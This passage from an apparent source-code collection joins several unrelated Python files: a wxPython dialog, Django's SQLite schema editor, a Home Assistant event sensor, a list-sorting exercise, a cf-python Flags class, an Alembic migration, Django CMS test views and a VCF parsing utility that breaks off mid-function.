raise ValueError('Not a number for port {0}.'.format(i))
except (IOError, ValueError) as e:
MessageDialog(self, str(e), 'Load error').Show()
return
for port, values in zip(self.vsrc.ports, port_values):
port.gain = float(values[0])
port.offset = float(values[1])
class ch4VoltageSourceSettingsDialog(Dialog):
"""
A wrapper for ch4VoltageSourceSettingsPanel.
"""
def __init__(self, parent, global_store, vsrc_name, *args, **kwargs):
# If the device doesn't exist, give up.
try:
vsrc = global_store.devices[vsrc_name].device
except (KeyError, AttributeError):
self.Destroy()
return
Dialog.__init__(self, parent, title='Four channel voltage source settings', *args, **kwargs)
self.vsrc_name = vsrc_name
# Dialog.
dialog_box = wx.BoxSizer(wx.VERTICAL)
## Settings panel.
self.panel = ch4VoltageSourceSettingsPanel(self, global_store, vsrc)
dialog_box.Add(self.panel)
self.SetSizerAndFit(dialog_box)
# Subscriptions.
pub.subscribe(self.msg_device, 'device.added')
pub.subscribe(self.msg_device, 'device.removed')
def msg_device(self, name, value=None):
if name == self.vsrc_name:
# Device has changed, so we can't trust it anymore.
self.Destroy()
return
|
py | 1a4b94fa826b56c95d46d8dda64d01fc0db7b0e6 | import copy
from decimal import Decimal
from django.apps.registry import Apps
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.db.backends.ddl_references import Statement
from django.db.transaction import atomic
from django.db.utils import NotSupportedError
class DatabaseSchemaEditor(BaseDatabaseSchemaEditor):
sql_delete_table = "DROP TABLE %(table)s"
sql_create_inline_fk = "REFERENCES %(to_table)s (%(to_column)s) DEFERRABLE INITIALLY DEFERRED"
sql_create_unique = "CREATE UNIQUE INDEX %(name)s ON %(table)s (%(columns)s)"
sql_delete_unique = "DROP INDEX %(name)s"
sql_foreign_key_constraint = None
def __enter__(self):
# Some SQLite schema alterations need foreign key constraints to be
# disabled. Enforce it here for the duration of the schema edition.
if not self.connection.disable_constraint_checking():
raise NotSupportedError(
'SQLite schema editor cannot be used while foreign key '
'constraint checks are enabled. Make sure to disable them '
'before entering a transaction.atomic() context because '
'SQLite does not support disabling them in the middle of '
'a multi-statement transaction.'
)
return super().__enter__()
def __exit__(self, exc_type, exc_value, traceback):
self.connection.check_constraints()
super().__exit__(exc_type, exc_value, traceback)
self.connection.enable_constraint_checking()
def quote_value(self, value):
# The backend "mostly works" without this function and there are use
# cases for compiling Python without the sqlite3 libraries (e.g.
# security hardening).
try:
import sqlite3
value = sqlite3.adapt(value)
except ImportError:
pass
except sqlite3.ProgrammingError:
pass
# Manual emulation of SQLite parameter quoting
if isinstance(value, bool):
return str(int(value))
elif isinstance(value, (Decimal, float, int)):
return str(value)
elif isinstance(value, str):
return "'%s'" % value.replace("\'", "\'\'")
elif value is None:
return "NULL"
elif isinstance(value, (bytes, bytearray, memoryview)):
# Bytes are only allowed for BLOB fields, encoded as string
# literals containing hexadecimal data and preceded by a single "X"
# character.
return "X'%s'" % value.hex()
else:
raise ValueError("Cannot quote parameter value %r of type %s" % (value, type(value)))
def _is_referenced_by_fk_constraint(self, table_name, column_name=None, ignore_self=False):
"""
Return whether or not the provided table name is referenced by another
one. If `column_name` is specified, only references pointing to that
column are considered. If `ignore_self` is True, self-referential
constraints are ignored.
"""
with self.connection.cursor() as cursor:
for other_table in self.connection.introspection.get_table_list(cursor):
if ignore_self and other_table.name == table_name:
continue
constraints = self.connection.introspection._get_foreign_key_constraints(cursor, other_table.name)
for constraint in constraints.values():
constraint_table, constraint_column = constraint['foreign_key']
if (constraint_table == table_name and
(column_name is None or constraint_column == column_name)):
return True
return False
def alter_db_table(self, model, old_db_table, new_db_table, disable_constraints=True):
if (not self.connection.features.supports_atomic_references_rename and
disable_constraints and self._is_referenced_by_fk_constraint(old_db_table)):
if self.connection.in_atomic_block:
raise NotSupportedError((
'Renaming the %r table while in a transaction is not '
'supported on SQLite < 3.26 because it would break referential '
'integrity. Try adding `atomic = False` to the Migration class.'
) % old_db_table)
self.connection.enable_constraint_checking()
super().alter_db_table(model, old_db_table, new_db_table)
self.connection.disable_constraint_checking()
else:
super().alter_db_table(model, old_db_table, new_db_table)
def alter_field(self, model, old_field, new_field, strict=False):
old_field_name = old_field.name
table_name = model._meta.db_table
_, old_column_name = old_field.get_attname_column()
if (new_field.name != old_field_name and
not self.connection.features.supports_atomic_references_rename and
self._is_referenced_by_fk_constraint(table_name, old_column_name, ignore_self=True)):
if self.connection.in_atomic_block:
raise NotSupportedError((
'Renaming the %r.%r column while in a transaction is not '
'supported on SQLite < 3.26 because it would break referential '
'integrity. Try adding `atomic = False` to the Migration class.'
) % (model._meta.db_table, old_field_name))
with atomic(self.connection.alias):
super().alter_field(model, old_field, new_field, strict=strict)
# Follow SQLite's documented procedure for performing changes
# that don't affect the on-disk content.
# https://sqlite.org/lang_altertable.html#otheralter
with self.connection.cursor() as cursor:
schema_version = cursor.execute('PRAGMA schema_version').fetchone()[0]
cursor.execute('PRAGMA writable_schema = 1')
references_template = ' REFERENCES "%s" ("%%s") ' % table_name
new_column_name = new_field.get_attname_column()[1]
search = references_template % old_column_name
replacement = references_template % new_column_name
cursor.execute('UPDATE sqlite_master SET sql = replace(sql, %s, %s)', (search, replacement))
cursor.execute('PRAGMA schema_version = %d' % (schema_version + 1))
cursor.execute('PRAGMA writable_schema = 0')
# The integrity check will raise an exception and rollback
# the transaction if the sqlite_master updates corrupt the
# database.
cursor.execute('PRAGMA integrity_check')
# Perform a VACUUM to refresh the database representation from
# the sqlite_master table.
with self.connection.cursor() as cursor:
cursor.execute('VACUUM')
else:
super().alter_field(model, old_field, new_field, strict=strict)
def _remake_table(self, model, create_field=None, delete_field=None, alter_field=None):
"""
Shortcut to transform a model from old_model into new_model
This follows the correct procedure to perform non-rename or column
addition operations based on SQLite's documentation
https://www.sqlite.org/lang_altertable.html#caution
The essential steps are:
1. Create a table with the updated definition called "new__app_model"
2. Copy the data from the existing "app_model" table to the new table
3. Drop the "app_model" table
4. Rename the "new__app_model" table to "app_model"
5. Restore any index of the previous "app_model" table.
"""
# Self-referential fields must be recreated rather than copied from
# the old model to ensure their remote_field.field_name doesn't refer
# to an altered field.
def is_self_referential(f):
return f.is_relation and f.remote_field.model is model
# Work out the new fields dict / mapping
body = {
f.name: f.clone() if is_self_referential(f) else f
for f in model._meta.local_concrete_fields
}
# Since mapping might mix column names and default values,
# its values must be already quoted.
mapping = {f.column: self.quote_name(f.column) for f in model._meta.local_concrete_fields}
# This maps field names (not columns) for things like unique_together
rename_mapping = {}
# If any of the new or altered fields is introducing a new PK,
# remove the old one
restore_pk_field = None
if getattr(create_field, 'primary_key', False) or (
alter_field and getattr(alter_field[1], 'primary_key', False)):
for name, field in list(body.items()):
if field.primary_key:
field.primary_key = False
restore_pk_field = field
if field.auto_created:
del body[name]
del mapping[field.column]
# Add in any created fields
if create_field:
body[create_field.name] = create_field
# Choose a default and insert it into the copy map
if not create_field.many_to_many and create_field.concrete:
mapping[create_field.column] = self.quote_value(
self.effective_default(create_field)
)
# Add in any altered fields
if alter_field:
old_field, new_field = alter_field
body.pop(old_field.name, None)
mapping.pop(old_field.column, None)
body[new_field.name] = new_field
if old_field.null and not new_field.null:
case_sql = "coalesce(%(col)s, %(default)s)" % {
'col': self.quote_name(old_field.column),
'default': self.quote_value(self.effective_default(new_field))
}
mapping[new_field.column] = case_sql
else:
mapping[new_field.column] = self.quote_name(old_field.column)
rename_mapping[old_field.name] = new_field.name
# Remove any deleted fields
if delete_field:
del body[delete_field.name]
del mapping[delete_field.column]
# Remove any implicit M2M tables
if delete_field.many_to_many and delete_field.remote_field.through._meta.auto_created:
return self.delete_model(delete_field.remote_field.through)
# Work inside a new app registry
apps = Apps()
# Work out the new value of unique_together, taking renames into
# account
unique_together = [
[rename_mapping.get(n, n) for n in unique]
for unique in model._meta.unique_together
]
# Work out the new value for index_together, taking renames into
# account
index_together = [
[rename_mapping.get(n, n) for n in index]
for index in model._meta.index_together
]
indexes = model._meta.indexes
if delete_field:
indexes = [
index for index in indexes
if delete_field.name not in index.fields
]
constraints = list(model._meta.constraints)
# Provide isolated instances of the fields to the new model body so
# that the existing model's internals aren't interfered with when
# the dummy model is constructed.
body_copy = copy.deepcopy(body)
# Construct a new model with the new fields to allow self referential
# primary key to resolve to. This model won't ever be materialized as a
# table and solely exists for foreign key reference resolution purposes.
# This wouldn't be required if the schema editor was operating on model
# states instead of rendered models.
meta_contents = {
'app_label': model._meta.app_label,
'db_table': model._meta.db_table,
'unique_together': unique_together,
'index_together': index_together,
'indexes': indexes,
'constraints': constraints,
'apps': apps,
}
meta = type("Meta", (), meta_contents)
body_copy['Meta'] = meta
body_copy['__module__'] = model.__module__
type(model._meta.object_name, model.__bases__, body_copy)
# Construct a model with a renamed table name.
body_copy = copy.deepcopy(body)
meta_contents = {
'app_label': model._meta.app_label,
'db_table': 'new__%s' % model._meta.db_table,
'unique_together': unique_together,
'index_together': index_together,
'indexes': indexes,
'constraints': constraints,
'apps': apps,
}
meta = type("Meta", (), meta_contents)
body_copy['Meta'] = meta
body_copy['__module__'] = model.__module__
new_model = type('New%s' % model._meta.object_name, model.__bases__, body_copy)
# Create a new table with the updated schema.
self.create_model(new_model)
# Copy data from the old table into the new table
self.execute("INSERT INTO %s (%s) SELECT %s FROM %s" % (
self.quote_name(new_model._meta.db_table),
', '.join(self.quote_name(x) for x in mapping),
', '.join(mapping.values()),
self.quote_name(model._meta.db_table),
))
# Delete the old table to make way for the new
self.delete_model(model, handle_autom2m=False)
        # Rename the new table to take the place of the old one
self.alter_db_table(
new_model, new_model._meta.db_table, model._meta.db_table,
disable_constraints=False,
)
# Run deferred SQL on correct table
for sql in self.deferred_sql:
self.execute(sql)
self.deferred_sql = []
# Fix any PK-removed field
if restore_pk_field:
restore_pk_field.primary_key = True
def delete_model(self, model, handle_autom2m=True):
if handle_autom2m:
super().delete_model(model)
else:
# Delete the table (and only that)
self.execute(self.sql_delete_table % {
"table": self.quote_name(model._meta.db_table),
})
# Remove all deferred statements referencing the deleted table.
for sql in list(self.deferred_sql):
if isinstance(sql, Statement) and sql.references_table(model._meta.db_table):
self.deferred_sql.remove(sql)
def add_field(self, model, field):
"""
Create a field on a model. Usually involves adding a column, but may
involve adding a table instead (for M2M fields).
"""
# Special-case implicit M2M tables
if field.many_to_many and field.remote_field.through._meta.auto_created:
return self.create_model(field.remote_field.through)
self._remake_table(model, create_field=field)
def remove_field(self, model, field):
"""
Remove a field from a model. Usually involves deleting a column,
but for M2Ms may involve deleting a table.
"""
# M2M fields are a special case
if field.many_to_many:
# For implicit M2M tables, delete the auto-created table
if field.remote_field.through._meta.auto_created:
self.delete_model(field.remote_field.through)
# For explicit "through" M2M fields, do nothing
# For everything else, remake.
else:
# It might not actually have a column behind it
if field.db_parameters(connection=self.connection)['type'] is None:
return
self._remake_table(model, delete_field=field)
def _alter_field(self, model, old_field, new_field, old_type, new_type,
old_db_params, new_db_params, strict=False):
"""Perform a "physical" (non-ManyToMany) field update."""
# Use "ALTER TABLE ... RENAME COLUMN" if only the column name
# changed and there aren't any constraints.
if (self.connection.features.can_alter_table_rename_column and
old_field.column != new_field.column and
self.column_sql(model, old_field) == self.column_sql(model, new_field) and
not (old_field.remote_field and old_field.db_constraint or
new_field.remote_field and new_field.db_constraint)):
return self.execute(self._rename_field_sql(model._meta.db_table, old_field, new_field, new_type))
# Alter by remaking table
self._remake_table(model, alter_field=(old_field, new_field))
# Rebuild tables with FKs pointing to this field if the PK type changed.
if old_field.primary_key and new_field.primary_key and old_type != new_type:
for rel in new_field.model._meta.related_objects:
if not rel.many_to_many:
self._remake_table(rel.related_model)
def _alter_many_to_many(self, model, old_field, new_field, strict):
"""Alter M2Ms to repoint their to= endpoints."""
if old_field.remote_field.through._meta.db_table == new_field.remote_field.through._meta.db_table:
# The field name didn't change, but some options did; we have to propagate this altering.
self._remake_table(
old_field.remote_field.through,
alter_field=(
# We need the field that points to the target model, so we can tell alter_field to change it -
# this is m2m_reverse_field_name() (as opposed to m2m_field_name, which points to our model)
old_field.remote_field.through._meta.get_field(old_field.m2m_reverse_field_name()),
new_field.remote_field.through._meta.get_field(new_field.m2m_reverse_field_name()),
),
)
return
# Make a new through table
self.create_model(new_field.remote_field.through)
# Copy the data across
self.execute("INSERT INTO %s (%s) SELECT %s FROM %s" % (
self.quote_name(new_field.remote_field.through._meta.db_table),
', '.join([
"id",
new_field.m2m_column_name(),
new_field.m2m_reverse_name(),
]),
', '.join([
"id",
old_field.m2m_column_name(),
old_field.m2m_reverse_name(),
]),
self.quote_name(old_field.remote_field.through._meta.db_table),
))
# Delete the old through table
self.delete_model(old_field.remote_field.through)
def add_constraint(self, model, constraint):
self._remake_table(model)
def remove_constraint(self, model, constraint):
self._remake_table(model)
|
py | 1a4b95a308d18176c13aa923577bf3b00461dccd | import datetime
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_NAME, CONF_ICON, CONF_WEEKDAY, ATTR_DATE
import homeassistant.util.dt as dt_util
from homeassistant.helpers.event import async_track_point_in_utc_time
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
CONF_EPOCH = 'epoch'
CONF_FREQUENCY = 'frequency'
DATE_STR_FORMAT = '%A, %Y-%m-%d'
WEEKDAY_STR_FORMAT = '%A'
DEFAULT_NAME = 'Upcoming Event'
DEFAULT_ICON = 'mdi:calendar-clock'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_EPOCH): cv.date,
vol.Optional(CONF_ICON): cv.icon,
vol.Required(CONF_FREQUENCY): vol.Coerce(int),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
})
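# A hedged configuration example for this platform (the platform name and the
# values below are assumptions for illustration; only epoch and frequency are
# required by the schema above):
#
#     sensor:
#       - platform: periodic_event
#         name: Recycling pickup
#         epoch: 2019-01-07        # any date the event occurred on
#         frequency: 2             # the event repeats every 2 weeks
#         icon: mdi:trash-can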
async def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Setup the sensor platform."""
sensor_name = config.get(CONF_NAME)
icon = config.get(CONF_ICON)
epoch = config.get(CONF_EPOCH)
frequency = config.get(CONF_FREQUENCY)
sensors = [
PeriodicEventSensor(hass, f'{sensor_name} Date', icon, epoch,
frequency),
PeriodicEventRelativeSensor(hass, sensor_name, icon, epoch, frequency),
]
for sensor in sensors:
async_track_point_in_utc_time(
hass, sensor.point_in_time_listener, sensor.get_next_interval())
async_add_entities(sensors, True)
class PeriodicEventSensor(Entity):
def __init__(self, hass, name, icon, epoch, frequency):
"""Initialize the sensor."""
self.hass = hass
self._name = name
self._icon = icon
self._epoch = epoch
self._frequency = frequency
self._state = None
self._next_event = None
self._update_internal_state(dt_util.utcnow())
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def icon(self):
"""Return the icon of the sensor."""
return self._icon
@property
def device_state_attributes(self):
return {
ATTR_DATE: self._next_event.isoformat(),
CONF_WEEKDAY: self._next_event.strftime(WEEKDAY_STR_FORMAT)
}
def _get_next_event(self, now):
""" Compute the next event """
from dateutil import relativedelta
today = dt_util.as_local(now).date()
weekday = relativedelta.weekdays[self._epoch.weekday()]
next_event = today + relativedelta.relativedelta(weekday=weekday)
# Check if this date matches the frequency after epoch, or else
# calculate the correct date
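        # Worked example (hypothetical dates): with epoch = Monday 2019-01-07,
        # frequency = 2 and today = Monday 2019-01-21, next_event starts 14 days
        # after the epoch, so remainder = 14 / 7 % 2 = 0 and the date is kept;
        # one week later remainder would be 1, so (2 - 1) extra weeks are added.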
remainder = (next_event - self._epoch).days / 7 % self._frequency
if remainder != 0:
next_event = next_event + \
datetime.timedelta(weeks=self._frequency - remainder)
return next_event
def get_next_interval(self, now=None):
"""Compute next time update should occur (at next event)."""
if not now:
now = dt_util.utcnow()
next_event = self._get_next_event(now)
return datetime.datetime(
next_event.year, next_event.month, next_event.day)
def _update_internal_state(self, now):
self._next_event = self._get_next_event(now)
self._state = self._next_event.strftime(DATE_STR_FORMAT)
@callback
def point_in_time_listener(self, now):
"""Update state and schedule same listener to run again."""
self._update_internal_state(now)
self.async_schedule_update_ha_state()
async_track_point_in_utc_time(
self.hass, self.point_in_time_listener, self.get_next_interval())
class PeriodicEventRelativeSensor(PeriodicEventSensor):
def get_next_interval(self, now=None):
"""Compute next time update should occur (eg updates daily)."""
if now is None:
now = dt_util.utcnow()
start_of_day = dt_util.start_of_local_day(dt_util.as_local(now))
return start_of_day + datetime.timedelta(days=1)
def _update_internal_state(self, now):
from natural.date import duration
super()._update_internal_state(now)
# Compute the human-readable text between today and the next event
today = dt_util.as_local(now).date()
difference = self._next_event - today
if (difference.days == 0):
self._state = 'Today'
elif (difference.days == 1):
self._state = 'Tomorrow'
else:
self._state = duration(self._next_event, now=today, precision=2)
|
py | 1a4b96eef10334d169c29886865db8c581f8e527 | bicycles = ['trek','cannondale','redline','specialized'];
print(bicycles);
print(bicycles[0]);
bicycles[0] = "dacati";
print(bicycles);
bicycles.append("ducati");
print(bicycles);
bicycles.insert(0,"ducati");
print(bicycles);
del bicycles[0];
print(bicycles);
bicycles.pop();
print(bicycles);
bicycles.pop(0);
print(bicycles);
bicycles.remove('redline');
print(bicycles);
# Sorting
cars = ['bmw','audi',"toyota",'subaru'];
cars.sort();
print(cars);
cars.sort(reverse=True);
print(cars);
cars = ['bmw','audi',"toyota",'subaru'];
print("Here is the original list:");
print(cars);
print("\nHere is the sorted list:");
print(sorted(cars));
print("\nHere is the original list:");
print(cars);
cars.reverse();
print(cars);
print(len(cars)); |
py | 1a4b99284b2dc9470a84ca7eaa2921210048741d | from numpy import argsort as numpy_argsort
from numpy import atleast_1d as numpy_atleast_1d
from numpy import ndarray as numpy_ndarray
from copy import deepcopy
from .functions import RTOL, ATOL, equals, _DEPRECATION_ERROR_KWARGS
from .functions import inspect as cf_inspect
class Flags:
'''Self-describing CF flag values.
Stores the flag_values, flag_meanings and flag_masks CF attributes in
an internally consistent manner.
'''
def __init__(self, **kwargs):
'''**Initialization**
:Parameters:
flag_values : optional
The flag_values CF property. Sets the `flag_values`
attribute.
flag_meanings : optional
The flag_meanings CF property. Sets the `flag_meanings`
attribute.
flag_masks : optional
The flag_masks CF property. Sets the `flag_masks`
attribute.
'''
for attr, value in kwargs.items():
if value is not None:
setattr(self, attr, value)
def __eq__(self, other):
'''x.__eq__(y) <==> x==y <==> x.equals(y)
'''
return self.equals(other)
def __ne__(self, other):
'''x.__ne__(y) <==> x!=y <==> not x.equals(y)
'''
return not self.equals(other)
def __hash__(self):
'''Return the hash value of the flags.
Note that the flags will be sorted in place.
:Returns:
`int`
The hash value.
**Examples:**
>>> hash(f)
-956218661958673979
'''
self.sort()
x = [tuple(getattr(self, attr, ()))
for attr in ('_flag_meanings', '_flag_values', '_flag_masks')]
return hash(tuple(x))
def __bool__(self):
'''x.__bool__() <==> x!=0
'''
for attr in ('_flag_meanings', '_flag_values', '_flag_masks'):
if hasattr(self, attr):
return True
#--- End: for
return False
# ----------------------------------------------------------------
# Attributes
# ----------------------------------------------------------------
@property
def flag_values(self):
'''The flag_values CF attribute.
Stored as a 1-d numpy array but may be set as any array-like
object.
    **Examples:**
>>> f.flag_values = ['a', 'b', 'c']
>>> f.flag_values
array(['a', 'b', 'c'], dtype='|S1')
>>> f.flag_values = numpy.arange(4, dtype='int8')
>>> f.flag_values
array([1, 2, 3, 4], dtype=int8)
>>> f.flag_values = 1
>>> f.flag_values
array([1])
'''
try:
return self._flag_values
except AttributeError:
raise AttributeError("'%s' has no attribute 'flag_values'" %
self.__class__.__name__)
@flag_values.setter
def flag_values(self, value):
if not isinstance(value, numpy_ndarray):
value = numpy_atleast_1d(value)
self._flag_values = value
@flag_values.deleter
def flag_values(self):
try:
del self._flag_values
except AttributeError:
raise AttributeError("Can't delete '%s' attribute 'flag_values'" %
self.__class__.__name__)
# ----------------------------------------------------------------
# Property attribute: flag_masks
# ----------------------------------------------------------------
@property
def flag_masks(self):
'''The flag_masks CF attribute.
Stored as a 1-d numpy array but may be set as array-like object.
    **Examples:**
>>> f.flag_masks = numpy.array([1, 2, 4], dtype='int8')
>>> f.flag_masks
array([1, 2, 4], dtype=int8)
>>> f.flag_masks = 1
>>> f.flag_masks
array([1])
'''
try:
return self._flag_masks
except AttributeError:
raise AttributeError("'%s' object has no attribute 'flag_masks'" %
self.__class__.__name__)
@flag_masks.setter
def flag_masks(self, value):
if not isinstance(value, numpy_ndarray):
value = numpy_atleast_1d(value)
self._flag_masks = value
@flag_masks.deleter
def flag_masks(self):
try:
del self._flag_masks
except AttributeError:
raise AttributeError("Can't delete '%s' attribute 'flag_masks'" %
self.__class__.__name__)
@property
def flag_meanings(self):
'''The flag_meanings CF attribute.
Stored as a 1-d numpy string array but may be set as a space
delimited string or any array-like object.
    **Examples:**
>>> f.flag_meanings = 'low medium high'
>>> f.flag_meanings
array(['low', 'medium', 'high'],
dtype='|S6')
>>> f.flag_meanings = ['left', 'right']
>>> f.flag_meanings
array(['left', 'right'],
dtype='|S5')
>>> f.flag_meanings = 'ok'
>>> f.flag_meanings
array(['ok'],
dtype='|S2')
>>> f.flag_meanings = numpy.array(['a', 'b'])
>>> f.flag_meanings
array(['a', 'b'],
dtype='|S1')
'''
try:
return self._flag_meanings
except AttributeError:
raise AttributeError("'%s' object has no attribute 'flag_meanings'" %
self.__class__.__name__)
@flag_meanings.setter
def flag_meanings(self, value):
if isinstance(value, str):
value = numpy_atleast_1d(value.split())
elif not isinstance(value, numpy_ndarray):
value = numpy_atleast_1d(value)
self._flag_meanings = value
@flag_meanings.deleter
def flag_meanings(self):
try:
del self._flag_meanings
except AttributeError:
raise AttributeError("Can't delete '%s' attribute 'flag_meanings'" %
self.__class__.__name__)
def __repr__(self):
'''x.__repr__() <==> repr(x)
'''
string = []
if hasattr(self, 'flag_values'):
string.append('flag_values=%s' % str(self.flag_values))
if hasattr(self, 'flag_masks'):
string.append('flag_masks=%s' % str(self.flag_masks))
if hasattr(self, 'flag_meanings'):
string.append('flag_meanings=%s' % str(self.flag_meanings))
return '<CF %s: %s>' % (self.__class__.__name__,
', '.join(string))
def copy(self):
'''Return a deep copy.
Equivalent to ``copy.deepcopy(f)``
:Returns:
The deep copy.
    **Examples:**
>>> f.copy()
'''
return deepcopy(self)
def dump(self, display=True, _level=0):
'''Return a string containing a full description of the instance.
:Parameters:
display : bool, optional
If False then return the description as a string. By
default the description is printed, i.e. ``f.dump()`` is
equivalent to ``print(f.dump(display=False))``.
:Returns:
`None` or `str`
A string containing the description.
'''
indent0 = ' ' * _level
indent1 = ' ' * (_level+1)
string = ['%sFlags:' % indent0]
for attr in ('_flag_values', '_flag_meanings', '_flag_masks'):
value = getattr(self, attr, None)
if value is not None:
string.append('%s%s = %s' % (indent1, attr[1:], list(value)))
#--- End: for
string = '\n'.join(string)
if display:
print(string)
else:
return(string)
def equals(self, other, rtol=None, atol=None,
ignore_fill_value=False, verbose=False,
traceback=False):
'''True if two groups of flags are logically equal, False otherwise.
Note that both instances are sorted in place prior to the comparison.
:Parameters:
other:
The object to compare for equality.
atol: float, optional
The absolute tolerance for all numerical comparisons, By
default the value returned by the `ATOL` function is used.
rtol: float, optional
The relative tolerance for all numerical comparisons, By
default the value returned by the `RTOL` function is used.
ignore_fill_value: bool, optional
If True then data arrays with different fill values are
considered equal. By default they are considered unequal.
traceback: deprecated at version 3.0.0.
Use *verbose* instead.
:Returns:
`bool`
Whether or not the two instances are equal.
    **Examples:**
>>> f
<CF Flags: flag_values=[1 0 2], flag_masks=[2 0 2], flag_meanings=['medium' 'low' 'high']>
>>> g
<CF Flags: flag_values=[2 0 1], flag_masks=[2 0 2], flag_meanings=['high' 'low' 'medium']>
>>> f.equals(g)
True
>>> f
<CF Flags: flag_values=[0 1 2], flag_masks=[0 2 2], flag_meanings=['low' 'medium' 'high']>
>>> g
<CF Flags: flag_values=[0 1 2], flag_masks=[0 2 2], flag_meanings=['low' 'medium' 'high']>
'''
if traceback:
_DEPRECATION_ERROR_KWARGS(self, 'equals', traceback=True) # pragma: no cover
# Check that each instance is the same type
if self.__class__ != other.__class__:
if verbose:
print("%s: Different type: %s, %s" %
(self.__class__.__name__,
self.__class__.__name__, other.__class__.__name__)) # pragma: no cover
return False
self.sort()
other.sort()
# Set default tolerances
if rtol is None:
rtol = RTOL()
if atol is None:
atol = ATOL()
for attr in ('_flag_meanings', '_flag_values', '_flag_masks'):
if hasattr(self, attr):
if not hasattr(other, attr):
if verbose:
print("%s: Different attributes: %s" %
(self.__class__.__name__, attr[1:])) # pragma: no cover
return False
x = getattr(self, attr)
y = getattr(other, attr)
if (x.shape != y.shape or
not equals(x, y, rtol=rtol, atol=atol,
ignore_fill_value=ignore_fill_value,
verbose=verbose)):
if verbose:
print("%s: Different '%s': %r, %r" %
(self.__class__.__name__, attr[1:], x, y)) # pragma: no cover
return False
elif hasattr(other, attr):
if verbose:
print("%s: Different attributes: %s" %
(self.__class__.__name__, attr[1:])) # pragma: no cover
return False
#--- End: for
return True
def inspect(self):
'''Inspect the object for debugging.
.. seealso:: `cf.inspect`
:Returns:
`None`
'''
print(cf_inspect(self)) # pragma: no cover
def sort(self):
'''Sort the flags in place.
By default sort by flag values. If flag values are not present
then sort by flag meanings. If flag meanings are not present then
sort by flag_masks.
:Returns:
`None`
    **Examples:**
>>> f
<CF Flags: flag_values=[2 0 1], flag_masks=[2 0 2], flag_meanings=['high' 'low' 'medium']>
>>> f.sort()
>>> f
<CF Flags: flag_values=[0 1 2], flag_masks=[0 2 2], flag_meanings=['low' 'medium' 'high']>
'''
if not self:
return
# Sort all three attributes
        for attr in ('_flag_values', '_flag_meanings', '_flag_masks'):
if hasattr(self, attr):
indices = numpy_argsort(getattr(self, attr))
break
#--- End: for
for attr in ('_flag_values', '_flag_meanings', '_flag_masks'):
if hasattr(self, attr):
array = getattr(self, attr).view()
array[...] = array[indices]
#--- End: for
#--- End: class
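# A minimal usage sketch (assumed, mirroring the docstring examples above):
#
#     f = Flags(flag_values=[2, 0, 1],
#               flag_masks=[2, 0, 2],
#               flag_meanings='high low medium')
#     f.sort()            # reorders all three attributes by flag_values
#     f.flag_meanings     # -> array(['low', 'medium', 'high'], ...)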
|
py | 1a4b9935dee4ba242d4ded884bf4461cd701d973 | """Added transactions table
Revision ID: 5632aa202d89
Revises: 3a47813ce501
Create Date: 2015-03-18 14:54:09.061787
"""
# revision identifiers, used by Alembic.
revision = '5632aa202d89'
down_revision = '4d3ed7925db3'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table('quark_transactions',
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), nullable=False),
sa.PrimaryKeyConstraint('id'),
mysql_engine='InnoDB')
op.add_column(u'quark_ip_addresses',
sa.Column('transaction_id', sa.Integer(), nullable=True))
op.create_foreign_key('fk_quark_ips_transaction_id',
'quark_ip_addresses',
'quark_transactions',
['transaction_id'],
['id'])
def downgrade():
op.drop_constraint('fk_quark_ips_transaction_id', 'quark_ip_addresses',
type_='foreignkey')
op.drop_column(u'quark_ip_addresses', 'transaction_id')
op.drop_table('quark_transactions')
|
py | 1a4b993b104416cc731a1ab6435cf7397d62c69b | from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.template.base import Template
from django.template.context import RequestContext
from cms.test_utils.project.placeholderapp.models import (Example1,
MultilingualExample1)
from cms.utils import get_language_from_request
def example_view(request):
context = RequestContext(request)
context['examples'] = Example1.objects.all()
return render_to_response('placeholderapp.html', context)
def _base_detail(request, instance, template_name='detail.html',
item_name="char_1", template_string='',):
context = RequestContext(request)
context['instance'] = instance
context['item_name'] = item_name
if template_string:
template = Template(template_string)
return HttpResponse(template.render(context))
else:
return render_to_response(template_name, context)
def list_view_multi(request):
context = RequestContext(request)
context['examples'] = MultilingualExample1.objects.language(
get_language_from_request(request)).all()
return render_to_response('list.html', context)
def detail_view_multi(request, pk, template_name='detail_multi.html',
item_name="char_1", template_string='',):
instance = MultilingualExample1.objects.language(
get_language_from_request(request)).get(pk=pk)
return _base_detail(request, instance, template_name, item_name,
template_string)
def list_view(request):
context = RequestContext(request)
context['examples'] = Example1.objects.all()
return render_to_response('list.html', context)
def detail_view(request, pk, template_name='detail.html', item_name="char_1",
template_string='',):
instance = Example1.objects.get(pk=pk)
return _base_detail(request, instance, template_name, item_name,
template_string)
|
py | 1a4b99917cfcb2b399eee4b7b2e0bb47dfb3a4a1 | # Copied from cellSNP, https://raw.githubusercontent.com/single-cell-genetics/cellSNP/purePython/cellSNP/utils/vcf_utils.py
# Utilility functions for processing vcf files
# Author: Yuanhua Huang
# Date: 09/06/2019
import os
import sys
import gzip
import subprocess
import numpy as np
def parse_sample_info(sample_dat, sparse=True):
"""
Parse genotype information for each sample
Note, it requires the format for each variants to
be the same.
"""
if sample_dat == [] or sample_dat is None:
return None
# require the same format for all variants
format_all = [x[0] for x in sample_dat]
if format_all.count(format_all[0]) != len(format_all):
print("Error: require the same format for all variants.")
exit()
format_list = format_all[0].split(":")
RV = {}
for _format in format_list:
RV[_format] = []
if sparse:
RV['indices'] = []
RV['indptr'] = [0]
RV['shape'] = (len(sample_dat[0][1:]), len(sample_dat))
missing_val = ":".join(["."] * len(format_list))
cnt = 0
for j in range(len(sample_dat)): #variant j
_line = sample_dat[j]
for i in range(len(_line[1:])): #cell i
if _line[i+1] == missing_val:
continue
_line_key = _line[i+1].split(":")
for k in range(len(format_list)):
RV[format_list[k]].append(_line_key[k])
cnt += 1
RV['indices'].append(i)
RV['indptr'].append(cnt)
else:
for _line in sample_dat:
_line_split = [x.split(":") for x in _line[1:]]
for k in range(len(format_list)):
_line_key = [x[k] for x in _line_split]
